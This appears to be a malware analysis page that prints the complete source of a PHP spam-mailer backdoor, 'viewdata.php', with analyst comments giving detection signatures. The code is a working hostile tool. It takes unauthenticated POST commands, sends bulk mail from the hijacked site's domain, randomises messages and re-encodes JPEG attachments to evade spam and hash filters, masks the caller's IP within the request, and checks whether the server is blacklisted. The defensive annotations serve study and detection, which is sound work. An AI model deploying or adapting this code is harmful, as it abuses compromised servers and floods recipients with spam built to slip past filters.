viewdata.php – a spammer program

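With this file in place, a single URL can be used to send an endless stream of spam. The script answers plain GET requests with only "OK" and acts solely on POST requests, so look for POSTs to it in the web-server access log.
Interestingly, the code also checks whether the server's IP address is on DNS blacklists!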

<?php

// Request bootstrap for the mailer. Analyst notes are written for triage and
// detection; the code itself is left exactly as found.

// Turn off PHP error reporting and raise the time limits to 150 seconds, so a
// long mail batch neither aborts early nor emits warnings into the response.
@error_reporting(0);
@set_time_limit(150);
// Keep the script running even if the requesting client disconnects.
@ignore_user_abort(true);
@ini_set('max_execution_time',150);

// A GET request only ever receives the body "OK"; every action below needs
// POST. Detection: POST requests to this path in the access log.
if($_SERVER['REQUEST_METHOD']=='GET'){
	exit('OK');
}

// A made-up dotted quad, each part in the range 0-200.
$randString=rand(0,200).'.'.rand(0,200).'.'.rand(0,200).'.'.rand(0,200);

$compare=$_SERVER['REMOTE_ADDR'];

// Walk $_SERVER and replace every value equal to the caller's address with the
// made-up one. This only alters PHP's in-request copy of the variables - the
// web server's own access log still records the real client address.
// NOTE(review): presumably meant to keep the caller's IP out of anything that
// later reads $_SERVER during this request - confirm against the mail setup.
while($key=key($_SERVER)){
	if($_SERVER[$key]==$compare){
		@$_SERVER[$key]=$randString;
	}
	next($_SERVER);
}

// Command dispatch on the presence of a POST field: 'ch' runs the capability
// checks, 'sn' runs the bulk send. No credential or token is checked anywhere
// in the visible code before either handler runs.
if(isset($_POST['ch'])===true){
	Check(); exit;
}if(isset($_POST['sn'])===true){
	Send(); exit;
}

/**
 * Bulk-send handler, reached when the POST body contains 'sn'.
 *
 * Takes the recipient list ('em', colon-separated), an optional Reply-To
 * ('rpt') and the sender-name, subject and body templates ('f', 's', 'm')
 * directly from the request and mails one individually randomised message
 * per recipient. When $_FILES['file'] holds an uploaded file the attachment
 * path (SendAttach) is used, otherwise the plain path (SMail).
 *
 * Output: prints '*send:ok*' once the whole list is processed, or prints
 * '*send:bad*' and exits at the first recipient for which mail() fails.
 * The function never returns to its caller; it always exits.
 *
 * Defender notes: nothing here authenticates the caller or caps the list
 * size. The response markers and POST field names are fixed strings that
 * can be used as file, WAF and log signatures.
 */
function Send(){
	$replyto=urldecode($_POST['rpt']);
	$emails=urldecode($_POST['em']);

	// Recipients arrive as one colon-separated string.
	$ex=explode(':',$emails);

	// No uploaded file: plain message path. The templates are used as posted.
	if(!is_file($_FILES['file']['tmp_name'])){
		for($c=0,$max=sizeof($ex);$c<$max;$c++){
			// Fresh template expansion per recipient, so each message differs.
			$r_from=Random(dataHandler($_POST['f']));
			$r_subject=Random(dataHandler($_POST['s']));
			$r_message=Random($_POST['m']);
			$from_name=randText();
			// '[from:]' in the body or subject is replaced by the chosen sender name.
			$r_message=str_ireplace('[from:]',$r_from,$r_message);
			$r_subject=str_ireplace('[from:]',$r_from,$r_subject);

			// Default Reply-To is a random local part at the request's Host header
			// value, i.e. the domain of the site hosting this file.
			if($replyto==''){
				$reply=$from_name.'@'.$_SERVER['HTTP_HOST'];
			}else{
				$reply=$replyto;
			}

			if(!SMail(trim($ex[$c]),$r_from,$r_message,$r_subject,$reply,$from_name)){
				print '*send:bad*'; exit;
			}
		}
	}else{
		// Uploaded file present: attachment path. Unlike the branch above, the
		// templates are passed through urldecode() first.
		for($c=0,$max=sizeof($ex);$c<$max;$c++){
			$r_from=Random(dataHandler(urldecode($_POST['f'])));
			$r_subject=Random(dataHandler(urldecode($_POST['s'])));
			$r_message=Random(urldecode($_POST['m']));
			$from_name=randText();
			$r_message=str_ireplace('[from:]',$r_from,$r_message);
			$r_subject=str_ireplace('[from:]',$r_from,$r_subject);

			if($replyto==''){
				$reply=$from_name.'@'.$_SERVER['HTTP_HOST'];
			}else{
				$reply=$replyto;
			}

			if(!SendAttach(trim($ex[$c]),$r_from,$r_message,$r_subject,$reply,$from_name)){
				print '*send:bad*'; exit;
			}
		}
	}
	print '*send:ok*'; exit;
}

/**
 * Sends one message without attachment through PHP's mail().
 *
 * $to        recipient address (one entry of the posted list)
 * $from      display name for the From header, emitted base64-encoded
 * $message   message body, passed to mail() as is
 * $subject   subject line, passed to mail() as is
 * $replyto   value written verbatim into the Reply-To header
 * $from_name local part of the From address; the domain is the request's
 *            Host header value
 *
 * Returns true when mail() reports success, false otherwise.
 *
 * Defender notes: resulting messages carry 'X-Mailer: PHP/<version>' and a
 * From address of random letters at the hosting site's own domain, which is
 * a useful pattern for mail-log and outbound-filter rules.
 */
function SMail($to,$from,$message,$subject,$replyto,$from_name){
	// POST field 'tp' equal to '1' selects HTML, anything else plain text.
	if($_POST['tp']=='1'){ $type='text/html'; }
	else{ $type='text/plain'; }
	$header='From: '.'=?utf-8?B?'.base64_encode($from).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].">\r\n";
	$header.='MIME-Version: 1.0'."\r\n";
	$header.='Content-Type: '.$type.'; charset="utf-8"'."\r\n";
	// Request-supplied value concatenated into the header block unfiltered.
	$header.='Reply-To: '.$replyto."\r\n";
	$header.='X-Mailer: PHP/'.phpversion();

	if(mail($to,$subject,$message,$header)){
		return true;
	}
	return false;
}

/**
 * Sends one multipart/mixed message carrying the uploaded file.
 *
 * Parameters have the same meaning as in SMail(). The attachment content
 * comes from fileString() and its displayed name from filename(), both
 * derived from $_FILES['file'], so name and (for JPEGs) bytes can differ
 * on every call.
 *
 * Returns true when mail() reports success, false otherwise.
 *
 * Defender notes: the attachment's Content-Type is the client-declared
 * upload type, the part carries an 'X-Attachment-Id' of 4-5 random digits,
 * and the message carries 'X-Mailer: PHP/<version>'.
 */
function SendAttach($to,$from,$message,$subject,$replyto,$from_name){
	// Per-message MIME boundary; attachment bytes are loaded once per call.
	$boundary=md5(uniqid()); $fileString=fileString($_FILES['file']['name']);
	if($_POST['tp']=='1'){ $type='text/html'; }
	else{ $type='text/plain'; }
	$filename=filename($_FILES['file']['name']);

	$headers='MIME-Version: 1.0'."\r\n";
	$headers.='From: '.'=?utf-8?B?'.base64_encode($from).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].'>'."\r\n";
	$headers.='Reply-To: '.$replyto."\r\n";
	$headers.='X-Mailer: PHP/'.phpversion()."\r\n";
	$headers.='Content-Type: multipart/mixed; boundary="'.$boundary."\"\r\n\r\n";

	// First part: the text or HTML body, base64-encoded.
	$body='--'.$boundary."\r\n";
	$body.='Content-Type: '.$type.'; charset="utf-8"'."\r\n";
	$body.='Content-Transfer-Encoding: base64'."\r\n\r\n";
	$body.=chunk_split(base64_encode($message));

	// Second part: the attachment, base64-encoded.
	$body.= '--'.$boundary."\r\n";
	$body.='Content-Type: '.$_FILES['file']['type'].'; name="'.$filename.'"'."\r\n";
	$body.='Content-Disposition: attachment; filename="'.$filename.'"'."\r\n";
	$body.='Content-Transfer-Encoding: base64'."\r\n";
	$body.='X-Attachment-Id: '.rand(1000,99999)."\r\n\r\n";
	$body.=chunk_split(base64_encode($fileString));

	if(mail($to,$subject,$body,$headers)){
		return true;
	}
	return false;
}

/**
 * Picks one line at random from a newline-separated value.
 *
 * $data  text that may hold several alternatives, one per line
 *
 * Returns a randomly chosen line, trimmed; when $data has no newline the
 * whole value is returned trimmed. Send() uses it for the sender-name and
 * subject fields, so those vary from message to message.
 */
function dataHandler($data){
	$ex=explode("\n",$data);

	if(sizeof($ex)>1){
		return trim($ex[rand(0,sizeof($ex)-1)]);
	}
	return trim($data);
}

/**
 * Expands the template placeholders found in $text.
 *
 *   [rand:a|b|c]  is replaced by one of the '|'-separated alternatives
 *   [num:lo|hi]   is replaced by a random integer between lo and hi
 *
 * Each placeholder occurrence is expanded separately (replacement limit 1),
 * so repeated placeholders can yield different values.
 *
 * $text  template string taken from the request
 *
 * Returns the expanded text.
 *
 * NOTE(review): presumably this exists so that no two messages share the
 * same content, which works against similarity-based bulk-mail detection;
 * filters keyed on headers and sending behaviour are not affected by it.
 */
function Random($text){
	// Collect all placeholders up front: [0] holds the full tokens, [1] the
	// text between the colon and the closing bracket.
	preg_match_all('#\[rand:(.+?)\]#is',$text,$result); $c=0;
	preg_match_all('#\[num:(.+?)\]#is',$text,$result2); $i=0;

	while($c<sizeof($result[1])){
		$rand=explode('|',$result[1][$c]);
		$rand=$rand[array_rand($rand)];

		// Hand-rolled escaping of the token so it can be used as a regex.
		$search=array('[',']','|','?','.','*','#','(',')','$','^','+','{','}');
		$replace=array('\[','\]','\|','\?','\.','\*','\#','\(','\)','\$','\^','\+','\{','\}');
		$str=str_replace($search,$replace,$result[0][$c]);
		// Replace only the first remaining occurrence of this token.
		$text=preg_replace('#'.$str.'#',$rand,$text,1); $c++;
	}

	while($i<sizeof($result2[1])){
		$rand=explode('|',$result2[1][$i]);
		// Both bounds must be numeric for the token to be expanded.
		if(!is_numeric($rand[0]) or !is_numeric($rand[1])){ continue; }
		$rand=rand($rand[0],$rand[1]);

		$search=array('[',']','|');
		$replace=array('\[','\]','\|');
		$str=str_replace($search,$replace,$result2[0][$i]);
		$text=preg_replace('#'.$str.'#',$rand,$text,1); $i++;
	}

	return $text;
}

/**
 * Capability-check handler, reached when the POST body contains 'ch'.
 *
 * Runs up to three independent probes, selected by further POST fields,
 * and prints one marker per probe:
 *
 *   'st'  liveness probe; prints '*valid:ok*'
 *   'm'   test mail; the value is 'address:attach:reply'. Prints
 *         '*mail:ok*' or '*mail:bad*' ('bad' also when mail() is missing)
 *   'rb'  DNS blacklist lookup via rbl(); prints '*rbl:ok*' when the
 *         server is not listed, otherwise '*rbl:' followed by the result
 *
 * Defender notes: these markers in an HTTP response body identify this
 * tool with high confidence; they are suitable for response-inspection
 * rules and for grepping suspect files.
 */
function Check(){
	$crlf="\r\n";

	if(isset($_POST['st'])===true){
		print '*valid:ok*'.$crlf;
	}if(isset($_POST['m'])===true){
		if(function_exists('mail')){
			// Field layout: test address, attachment flag, reply flag.
			$ex=explode(':',$_POST['m']);
			$email=$ex[0]; $attach=$ex[1]; $reply=$ex[2];
			$from_name=randText();
			// Reply-To defaults to random letters at the request's Host value;
			// with the reply flag set it is the test address itself.
			$replyto=$from_name.'@'.$_SERVER['HTTP_HOST'];
			if($reply=='1'){ $replyto=$email; }
			if($attach=='1'){
				if(CheckAttach($email,$replyto,$from_name)){
					print '*mail:ok*'.$crlf;
				}else{
					print '*mail:bad*'.$crlf;
				}
			}else{
				if(CheckMail($email,$replyto,$from_name)){
					print '*mail:ok*'.$crlf;
				}else{
					print '*mail:bad*'.$crlf;
				}
			}
		}else{
			print '*mail:bad*'.$crlf;
		}
	}if(isset($_POST['rb'])===true){
		$rbl=rbl();
		if($rbl==''){
			print '*rbl:ok*';
		}else{
			print '*rbl:'.$rbl.'*';
		}
	}
}

/**
 * Looks the hosting server up in five public DNS blacklists.
 *
 * The address is obtained by resolving the request's Host header value,
 * its octets are reversed, and an A-record query is made for
 * '<reversed-ip>.<zone>.' against each zone in $dnsbl_check.
 *
 * Returns the zones that returned a record as a ', '-separated string,
 * '' when none did, or '*rbl:unknown*' when no address was obtained.
 *
 * Defender notes: a web server that is not a mail server issuing DNSBL
 * queries about its own address is unusual; DNS query logs for these
 * zones are a practical detection point for this sample.
 */
function rbl(){
    $dnsbl_check=array('b.barracudacentral.org','xbl.spamhaus.org','sbl.spamhaus.org','zen.spamhaus.org','bl.spamcop.net');
	$ip=gethostbyname($_SERVER['HTTP_HOST']); $result='';

    if($ip){
        // DNSBL convention: query the reversed dotted quad under the zone.
        $rip=implode('.',array_reverse(explode('.',$ip)));
        foreach($dnsbl_check as $val){
            if(checkdnsrr($rip.'.'.$val.'.','A'))
                $result.=$val.', ';
        }
        // Drop the trailing ', ' separator.
        if(strlen($result)>2){ return substr($result,0,-2); }
        else{ return ''; }
    }else{
    	return '*rbl:unknown*';
    }
    // Not reached: both branches above return.
    return '';
}

/**
 * Sends a single test message without attachment, used by Check().
 *
 * $to        test recipient address
 * $reply     value written into the Reply-To header
 * $from_name local part of the From address
 *
 * The body is random filler from text(), the From display name is random
 * letters, and the subject is the request's Host header value.
 *
 * Returns true when mail() reports success, false otherwise.
 *
 * Defender notes: an HTML mail whose subject is the site's own hostname
 * and whose body is lowercase gibberish is the signature of this probe.
 */
function CheckMail($to,$reply,$from_name){
	$header='From: '.'=?utf-8?B?'.base64_encode(randText()).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].">\r\n";
	$header.='MIME-Version: 1.0'."\r\n";
	$header.='Content-Type: text/html; charset="utf-8"'."\r\n";
	$header.='Reply-To: '.$reply."\r\n";
	$header.='X-Mailer: PHP/'.phpversion();

	$message=text();
	$subject=$_SERVER['HTTP_HOST'];

	if(mail($to,$subject,$message,$header)){
		return true;
	}
	return false;
}

/**
 * Sends a single test message with a text attachment, used by Check().
 *
 * $to        test recipient address
 * $reply     value written into the Reply-To header
 * $from_name local part of the From address
 *
 * Body and attachment content are both random filler from text(); the
 * attachment is named by filename('1.txt'), i.e. random letters plus
 * '.txt'. The subject is the request's Host header value.
 *
 * Returns true when mail() reports success, false otherwise.
 */
function CheckAttach($to,$reply,$from_name){
	$message=text();
	$subject=$_SERVER['HTTP_HOST'];
	$filename=filename('1.txt'); $boundary=md5(uniqid());

	$headers='MIME-Version: 1.0'."\r\n";
	$headers.='From: '.'=?utf-8?B?'.base64_encode(randText()).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].'>'."\r\n";
	$headers.='Reply-To: '.$reply."\r\n";
	$headers.='X-Mailer: PHP/'.phpversion()."\r\n";
	$headers.='Content-Type: multipart/mixed; boundary="'.$boundary."\"\r\n\r\n";

	// First part: HTML body, base64-encoded.
	$body='--'.$boundary."\r\n";
	$body.='Content-Type: text/html; charset="utf-8"'."\r\n";
	$body.='Content-Transfer-Encoding: base64'."\r\n\r\n";
	$body.=chunk_split(base64_encode($message));

	// Second part: plain-text attachment filled with fresh random text.
	$body.= '--'.$boundary."\r\n";
	$body.='Content-Type: text/plain; name="'.$filename.'"'."\r\n";
	$body.='Content-Disposition: attachment; filename="'.$filename.'"'."\r\n";
	$body.='Content-Transfer-Encoding: base64'."\r\n";
	$body.='X-Attachment-Id: '.rand(1000,99999)."\r\n\r\n";
	$body.= chunk_split(base64_encode(text()));

	if(mail($to,$subject,$body,$headers)){
		return true;
	}
	return false;
}

/**
 * Produces a randomised attachment name that keeps the original extension.
 *
 * $name  original file name; only the part after the last '.' is used
 *
 * For png, jpg, gif, jpeg and bmp the result is one of the prefixes
 * 'SDC', 'P', 'DC', 'CAM', 'IMG-' followed by a random number between
 * 10 and 999999 and the extension. For any other extension the result is
 * random lowercase letters plus the extension.
 *
 * NOTE(review): the prefixes look like they imitate digital-camera file
 * names; treat attachment names of this shape in mail logs as a weak
 * indicator only, since genuine photos use similar names.
 */
function filename($name){
	$format=end(explode('.',$name));
	$array[]='SDC'; $array[]='P'; $array[]='DC'; $array[]='CAM'; $array[]='IMG-';
	$img=array('png','jpg','gif','jpeg','bmp');

	for($c=0,$max=sizeof($img);$c<$max;$c++){
		if(strtolower($format)==$img[$c]){
			$rand=rand(10,999999);
			return $array[rand(0,4)].$rand.'.'.$format;
		}
	}
	return randText().'.'.$format;
}

/**
 * Returns the bytes to attach for the uploaded file.
 *
 * $name  original file name, used only to read the extension
 *
 * For jpeg/jpg uploads, when the image functions listed in CheckRandIMG()
 * are available, the image is re-encoded with random changes by RandIMG().
 * In every other case the uploaded temp file is returned unchanged.
 *
 * Defender notes: SendAttach() calls this once per recipient, so JPEG
 * attachments from one campaign will generally not share a file hash;
 * hash-based attachment blocking is therefore of limited use here.
 */
function fileString($name){
	$format=end(explode('.',$name));

	if(strtolower($format)=='jpeg' or strtolower($format)=='jpg'){
		if(CheckRandIMG()){
			return RandIMG($_FILES['file']['tmp_name']);
		}
	}
	return file_get_contents($_FILES['file']['tmp_name']);
}

/**
 * Returns 3 to 8 random lowercase ASCII letters.
 *
 * Used for From local parts, default Reply-To local parts, display names
 * in the test mails and non-image attachment names.
 *
 * Triage note: the curly-brace string offset used below was removed in
 * PHP 8.0, so this sample was written for PHP 7 or earlier.
 */
function randText(){
	$str='qwertyuiopasdfghjklzxcvbnm';
	$size=rand(3,8); $result='';

	for($c=0;$c<$size;$c++){
		$result.=$str{rand(0,strlen($str)-1)};
	}
	return $result;
}

/**
 * Returns random filler text for the test mails.
 *
 * Builds 9 to 20 "words" of 6 to 10 random lowercase letters, each
 * followed by a separator drawn from a list weighted towards a plain
 * space (others: ', ', '? ', '. '), and trims the result.
 *
 * Defender notes: the output has no capital letters or digits and no
 * real words, which makes the probe mails easy to recognise by eye.
 */
function text(){
	$str='qwertyuiopasdfghjklzxcvbnm';
	$size=rand(9,20); $result='';

	for($c=0;$c<$size;$c++){
		// Length of this word.
		$rand=rand(6,10);
		
		for($i=0;$i<$rand;$i++){
			$result.=$str{rand(0,strlen($str)-1)};
		}
		// Four of the eight entries are a plain space.
		$sign=array(' ',' ',' ',' ',', ','? ','. ','. ');
		$result.=$sign[rand(0,7)];
	}
	return trim($result);
}

/**
 * Reports whether every function RandIMG() relies on is available.
 *
 * Returns true only when all listed image and output-buffering functions
 * exist in this PHP build; false as soon as one is missing, in which case
 * fileString() falls back to sending the upload unchanged.
 */
function CheckRandIMG(){
	$array=array(
		'getimagesize',
		'imagecreatetruecolor',
		'imagecreatefromjpeg',
		'imagecopyresampled',
		'imagefilter',
		'ob_start',
		'imagejpeg',
		'ob_get_clean'
	);

	for($c=0,$max=sizeof($array);$c<$max;$c++){
		if(!function_exists($array[$c])){
			return false;
		}
	}
	return true;
}

/**
 * Re-encodes a JPEG with small random changes and returns the new bytes.
 *
 * $file  path of the JPEG to read (the uploaded temp file)
 *
 * Five coin flips decide independently whether to change width, height,
 * JPEG quality, brightness and contrast. Width and height move by 1-10
 * pixels in either direction, brightness by 0-35, contrast by 1-15 in
 * either direction; quality is either 75 or a random value from 65 to 105.
 *
 * Returns the JPEG data captured from the output buffer.
 *
 * NOTE(review): the visible effect is that each call yields different
 * bytes for what looks like the same picture, presumably to defeat
 * exact-hash matching of attachments. Perceptual or fuzzy image hashing
 * is the matching defensive control.
 */
function RandIMG($file){
	// 1 means "apply this change", 2 means "leave as is".
	$rand['width']=rand(1,2);
	$rand['height']=rand(1,2);
	$rand['quality']=rand(1,2);
	$rand['brightness']=rand(1,2);
	$rand['contrast']=rand(1,2);

	list($width,$height)=getimagesize($file);

	if($rand['width']==1){
		$sign=rand(1,2);
		if($sign==1){
			$new_width=$width+rand(1,10);
		}else{
			$new_width=$width-rand(1,10);
		}
	}else{
		$new_width=$width;
	}if($rand['height']==1){
		$sign=rand(1,2);
		if($sign==1){
			$new_height=$height+rand(1,10);
		}else{
			$new_height=$height-rand(1,10);
		}
	}else{
		$new_height=$height;
	}if($rand['quality']==1){
		// Note the inversion: the "apply" value gives the fixed quality.
		$quality=75;
	}else{
		$quality=rand(65,105);
	}if($rand['brightness']==1){
		$brightness=rand(0,35);
	}else{
		$brightness=0;
	}if($rand['contrast']==1){
		$sign=rand(1,2);
		if($sign==1){ $sign='+'; }else{ $sign='-'; }
		$contrast=rand(1,15);
	}else{
		$sign='';
		$contrast=0;
	}

	// Resample into a canvas of the new size, then apply the two filters.
	$image_p=imagecreatetruecolor($new_width,$new_height);
	$image=imagecreatefromjpeg($file);
	imagecopyresampled($image_p, $image,0,0,0,0,$new_width,$new_height,$width,$height);
	imagefilter($image_p,IMG_FILTER_CONTRAST,$sign.$contrast);
	imagefilter($image_p,IMG_FILTER_BRIGHTNESS,$brightness);
	// imagejpeg() with a null target writes to output; capture it instead.
	ob_start();
	imagejpeg($image_p,null,$quality);
	$out=ob_get_clean();
	imagedestroy($image_p);

	return $out;
}

?>
